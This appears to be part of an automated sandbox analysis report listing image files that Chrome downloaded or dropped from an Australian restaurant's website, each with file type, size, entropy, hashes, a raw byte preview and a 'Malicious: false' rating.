                                                                                                                                                    Preview:..../.Exif..MM.*...............@...........*...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:06:20.............0221...................................................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..a.v....b......-"7.s.~:".=.i0g...elu....i.....'."..;.K.b8..(.v...x'RT..t
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x373, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):68979
                                                                                                                                                    Entropy (8bit):7.872524741977161
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QHFXM23HFXM2dmcLVS16FIVRo0XoyaG4NDfLSac2GG9D1iv7Y:QJvJ5VS16Sq6aGeLLjDGG9DL
                                                                                                                                                    MD5:1A3DDCA29358AF8CA5254428B2C354F7
                                                                                                                                                    SHA1:604D08322245716283A41192A7A88799EAAF12FB
                                                                                                                                                    SHA-256:D174BE56A5E6B59927911AE074F1F08D1E65E9E871B49391B5D3DE3EC9151DB0
                                                                                                                                                    SHA-512:D0646DF287A85CC9151A681A4EFE0D7D2E1AEC8400D09358D66840382B887DC2B96E0A12B89E9138DA06338BCCFE70CF095A37BD990E51FBB14C061E0D15DEF9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/takAway_1.jpg
                                                                                                                                                    Preview:......Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:14:47.............0221...................................u...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................U...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..y>.|QC..wk'.U......0....Ht....pc>........7...WO.`..k..5.~.....(..Q..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=415, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=739], progressive, precision 8, 440x560, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):57952
                                                                                                                                                    Entropy (8bit):7.838112916001375
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:ip2lJcZMZp2lJcZwl+quJiEPKvrjFXcE9BAGcS:iMaiZMaO+liEi3hNfpv
                                                                                                                                                    MD5:90DD99424980A77B181ADFE909BC1788
                                                                                                                                                    SHA1:9366B8365075DE9A1DFB257C603891ED77F52E06
                                                                                                                                                    SHA-256:9EDC4104D21E78C36BD474562DDF0030B1CB219EF29338B876EEB5E480FB7E90
                                                                                                                                                    SHA-512:3EB729FCB1C82281F6D0D1C96AA28536FA7F77326F7D7039EBB2DB92EDB1C7FDD1CA3BFFE6EF39C2F4A1D169A3BDDABD90D272EE1A9242E3F3FB1FACB1EE9A0C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....!MExif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 18:12:30.............0221...................................0...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................~.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...Y.T.j.S...w4C...KF...._.Nk.K^f.....w.{..t...z..s..S(kw.......k........9
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 55 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):20129
                                                                                                                                                    Entropy (8bit):3.5982825838960095
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:UvOkEW0EPxNXepSFyWec9Z4S30229Hy9EJ9E4wj77i9zMV0EOpKJWr7K7Ri31oP7:9kIMAqNcVJ9E5P7yMVGroiFeVz
                                                                                                                                                    MD5:F9B6C6D457455CB194B5DFD705CF7C68
                                                                                                                                                    SHA1:4A8B3D74C67FFAEA67966D8DC221B734CD16EAFF
                                                                                                                                                    SHA-256:A10A2B9FEB722C778166FB019E0767694E45F98859F7F61161B81EEBB66B0837
                                                                                                                                                    SHA-512:5C88266EC36BB2E799AB34964E4B04F372D38698207820ACB725E030F60902FD06E09DC8E2021A522330003DA66BE67442904D83A614276BD91AFDF8E79C645A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_beverage.png
                                                                                                                                                    Preview:.PNG........IHDR...7...0.............pHYs...t...t..f.x..?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:5365af65-0790-11ed-8b31-efd80a687273</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:dde93920-00bd-be
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 117 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):38109
                                                                                                                                                    Entropy (8bit):5.952437309555736
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:NcdDiMXU59dPTJS1+TBfugJ/+rLRyT80gT/:qYdIITBntyRyg0gT/
                                                                                                                                                    MD5:FE4EB42CFFCF904772EB27B7D4D140D6
                                                                                                                                                    SHA1:9E149381873454D6F4CFEB643ABD5F1823088173
                                                                                                                                                    SHA-256:5E5C8509C42BC39861D6E5CBA9A08F3A9F6B69E623FD81E9F45BF6F8ECF92700
                                                                                                                                                    SHA-512:9319141AF079BFA8A977DEE16A0E07FE6AE83B57D2F287491243B9E5A8DEFE04DA74F29F215F13EE6B69182F912A2735D082FAA791ED8860A9F892578713D9A4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...u...K.....Nt.a....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 95 x 74, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):38907
                                                                                                                                                    Entropy (8bit):5.992501509369346
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:gPdDi8JCU5prQXetkbr0z/rxlKdfyPNLPDAohXM:0nEng/rxTN4oe
                                                                                                                                                    MD5:46C2CF49E2D6887A745091E1A4B9469B
                                                                                                                                                    SHA1:993BAA8D199E70AF32AA487464BCCCE0463FD28F
                                                                                                                                                    SHA-256:CAB1AA7A489B063094499A4555CA093E8A5A7A9352EA49D0136ED695E64386C9
                                                                                                                                                    SHA-512:F8AE05552CE185E9896ED0921BB8EC518609C66DA5D6E1ED659E5E748DC416289E6E002327BC65D4CF897FB2C5A75DD7C11EF04F5D73CA585C351F4D548267E4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR..._...J......W......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 102 x 77, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):38979
                                                                                                                                                    Entropy (8bit):6.009310132625517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:P50wGdDiWks5LU5a9yPOUaRqv/RJuI16FUmcFfa/mTJSOQfmNuq:RcdDiWhU5kyPOUaAEI1hFfauNPzf
                                                                                                                                                    MD5:41D56A8BB55216FAF45D4402C8545463
                                                                                                                                                    SHA1:2BC3D76E1A3D33AF5450A73250076CC12121644A
                                                                                                                                                    SHA-256:1C2AA9763FA6D1DAEB63B6D760B52A7652ECFCA54EAE2FE7E9986FE87BA06782
                                                                                                                                                    SHA-512:F568876AB9FD0C525FCBF8714C3312ADC9FDE7E7448C2F169D550B50CC7DE2F2F45DE369C0BDB44504AFBBE1E2F1EFA05A60A737847B1CDB140C9633903FB1DA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...f...M.....T.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=440, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=550], progressive, precision 8, 2000x843, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):182091
                                                                                                                                                    Entropy (8bit):7.952907456537648
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:tc2c3XjKReeIs3MB7UNDIATd6ybIyhk+AOhKZYORFWbq5K+7ZBT30AvhElhy55y2:tc2cnjxeGkbTLlhk+iZvRFWbm0VsOXQT
                                                                                                                                                    MD5:D86B00C3ED730F6A28665E8E3F1D19EB
                                                                                                                                                    SHA1:946CE827FBF59760C68BD3A654A7E6CEEF3C34A1
                                                                                                                                                    SHA-256:F043818CE6C49A55EE964DBDB9A0A2FBC9DFF54AD171CE725610E6E13749181E
                                                                                                                                                    SHA-512:9438FACA97063F1C4E10E93E152C33429DD7594210B584D89DD9D00E5B98A49FFE65100A7363715B9ECFBA24BACFCD0F01AE99337C3134BED88CFED4ADE1EA9F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...............&.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:31:21.............0221..................................K...............................r...........z.(.................................w.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......'.&.....S..W9..!.].w5.].~......z.?T..5;.......c..5....{.....7c>.!...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=438, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=700], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):98758
                                                                                                                                                    Entropy (8bit):7.917641360443208
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:xJPrv0ljX1MJPrv0ljX1UyfOavEuagHTmHqzEoC7W4D4F7ZzVtfFac0iF+va/c6B:frMyrMFftvERgHqKzVCqlTzVtjHUgii
                                                                                                                                                    MD5:EE1E9A1DB28A04D2BD35C15E3BF9584A
                                                                                                                                                    SHA1:EC703487EC7B1740E8EE9754A247D08E1EFA107C
                                                                                                                                                    SHA-256:B24A8F7653E1629CA9C5C78C03A4E468C3C6F1F48827EBB43912DBB7291C6DB7
                                                                                                                                                    SHA-512:E73480A22D80C98B11CE2E8930CE86CA66FBE17D5F9FBDDE9324BC38D3FCD9ACEF36B0E428CC37860386908B54AFE75DFC569B16C6BF7DA363AD7E4F91627856
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:29:29.............0221...................................................................r...........z.(................................-s.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..}Lzk....(c.%.[.;...g.>.cG....>.t.. ....d.....+..W.....k...v.:..E.{Z.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 571x1068, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):157146
                                                                                                                                                    Entropy (8bit):7.945975707946798
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:kKB/KBrNiUlcXO7TXC1wGDnYUDGqCIRioemEHUKs+jNN9cYkSEUCgI4KJ:kKB/KBrNPC1wt0GWVsT/9cwE9g6
                                                                                                                                                    MD5:C22FD59F6EA98ED097099F945ABAECE2
                                                                                                                                                    SHA1:B7F0FC7D52739046A0867201939E91DE55602EC6
                                                                                                                                                    SHA-256:401BFE1327E5F4C79ABEFAC3D42883AA8DD98A6E4D7435CFAE717C450C01F5DA
                                                                                                                                                    SHA-512:A3E8369B73C44A2F827B8C36F979F8CCEC4382D97A4D964F8175178BB44002626F33C0110FBA36F5E9FAFC1B041D2D8483F2A1BB82DA6C39E841761CE8F65D7B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_7.jpg
                                                                                                                                                    Preview:.....@Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:10:05 17:19:26.............0221.......................;...........,...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................V.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..c....Ek..I.^).,......O5&..d....r.......:..Vj.i.Q...V\....R.5......?..H
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 90 x 86, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):38060
                                                                                                                                                    Entropy (8bit):5.9412356661026635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:JgdDi7/U5Bxp7emU3WXvp7MwWi9hkt6Av3:SR7kUtWijavv3
                                                                                                                                                    MD5:EADA2A431DE19D55F58435C6CF098EE6
                                                                                                                                                    SHA1:77E4F36CBCE439AB91787C2FC7F46F92A10129B1
                                                                                                                                                    SHA-256:BCB24BBFAD81B005443651C553137907739135A3C41FBB77C3E4B58BF723DB42
                                                                                                                                                    SHA-512:4DCBD8A5CBC7C80DB3CD3B49E8EFDAD04FBB3F897AC8200D73854896AE3AEDF9C8C9344CD15E82D2AF4CD7FA6672723E499E740872F510A6BACEB6E73654F7AA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Spicy_Battered_FishFillet.png
                                                                                                                                                    Preview:.PNG........IHDR...Z...V.....Oj.y....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=768, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1024], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):59560
                                                                                                                                                    Entropy (8bit):7.825074021810936
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:aEOrYaSEOrYaFyGHO/s94dELbLMAJvnB4LdsjbA7plv:aEOr+EOrI/swVAbWoUplv
                                                                                                                                                    MD5:771ADDA1FCF96AB29C7E9C30FCDC00DD
                                                                                                                                                    SHA1:20BBF84F861B2A2E4F3B85F98372AF1A9F8031D4
                                                                                                                                                    SHA-256:45A002D5B6B4C0E7B38283E62E40EFB07AD19D94D96CDD1BAD1898C2115ED38B
                                                                                                                                                    SHA-512:810504A64E34A3239280193D768D309FC9DD0ECD4D0E13ECB109C40531CB6C7AD483BE72B61CA8B60DBA160BB926755DA847E68A9B5B94CC8E7D51FC09DB09E9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_new1.jpg
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:12:28 00:06:19.............0221...................................................................r...........z.(.................................P.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....V.Ta..%.j+B.@.F.P...J..Yq....+2....G.o.....B&\!../r^.w]......M..<....
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):190555
                                                                                                                                                    Entropy (8bit):7.954957021533176
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:jehaehehi3CioIEiox5cxVGeWBBZROyXBHCA93o7f+GOonp2oELWSzi3cY4ipG9:KbUhiRNErx5jBROABiG4DYobEKSm3IiO
                                                                                                                                                    MD5:775875ABA6FB63229157E9E145DE01C8
                                                                                                                                                    SHA1:98E5379DE511708E83865A13EB0061FDC1F1AB81
                                                                                                                                                    SHA-256:69B7E124943D9FDA1A37726669EE17768235B4402422CEEE78AC20BC31AFBDCC
                                                                                                                                                    SHA-512:C4AF44B0DD2488D1534153DAADF050B85D55A6731C7401511D92C19779BD39C27F9FFAF810B0E665C757C3581303C344C9B1CD8EFDA0C48991A9CC81C003D130
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:31:29.............0221...................................................................r...........z.(................................,........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?........G......w........_3=......z*s..1[F..[...o...V..l.....U]q/.....KN...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=6000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=4000], progressive, precision 8, 688x1032, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165434
                                                                                                                                                    Entropy (8bit):7.9103296079104295
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:38+8UBQSZOLSFSj9crdOV05zbv62GvMUvTECrSafNXbt7sE+x:71O+E9crtSWUv2afNXbt7sE+x
                                                                                                                                                    MD5:D9215AFFA3CC9EC7AF2847F070D5B311
                                                                                                                                                    SHA1:4D36E1C714E425CBEC3E67347CA5F866A7FE0C61
                                                                                                                                                    SHA-256:F8995E186329F07AD9EA27A71D0D2E8BE2414E9BB04450A89AB85518FA282F3B
                                                                                                                                                    SHA-512:C8A774B0A00E0C40FB5A67F43B64270C7CA76FC15CBF628F96C6A7F683205310C118C2CA67641D34FE9EAB80AC886AFA3EF9FCB1162000436CBC9AF7600997E6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.....PExif..MM.*...........................p...................................................................................................(...........1.....".....2.........*.........................i.........@.%.........$...8......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:10:05 17:14:42....)...........2...........:."...........'.......@...0...........2.........@........0231...........B...........V...........j...........q...........x........................................................................................................50..........50..........50..........0100.....................................................................................................................................0...........1...........2..........4..........5..........................................2023:08:19 16:09:11.2023:08:19 16:09:11.+10:00.+10:00.+10:00............................K.................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 89 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):36530
                                                                                                                                                    Entropy (8bit):5.8087384139920415
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:w50wDdDilkX5fU5HUxMcuTnlNgzGIqVAhNzamoBfwcQrbfdnt:+RdDil2U50xMRngDQkO/BwcQrpnt
                                                                                                                                                    MD5:5EB25337DAB7B4CFFAE941D489F9EFD3
                                                                                                                                                    SHA1:570B3CCC48F75794A78224790A9B654D10D3600E
                                                                                                                                                    SHA-256:A34F83148B52CD956899BD25E9E4CA585EBEC318F214CADE4A387C3C5FAAA89B
                                                                                                                                                    SHA-512:3BF79715C106B1D13453749AFBC164E380E5FFF5118A00E3706DC3DCBFE3A9A8F03029936E840AEDA80B6A89FC4FF1C6E84D0932FDE60FF7BE7421D0147DF8AE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...Y...K.......+?....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 95 x 74, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):38907
                                                                                                                                                    Entropy (8bit):5.992501509369346
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:gPdDi8JCU5prQXetkbr0z/rxlKdfyPNLPDAohXM:0nEng/rxTN4oe
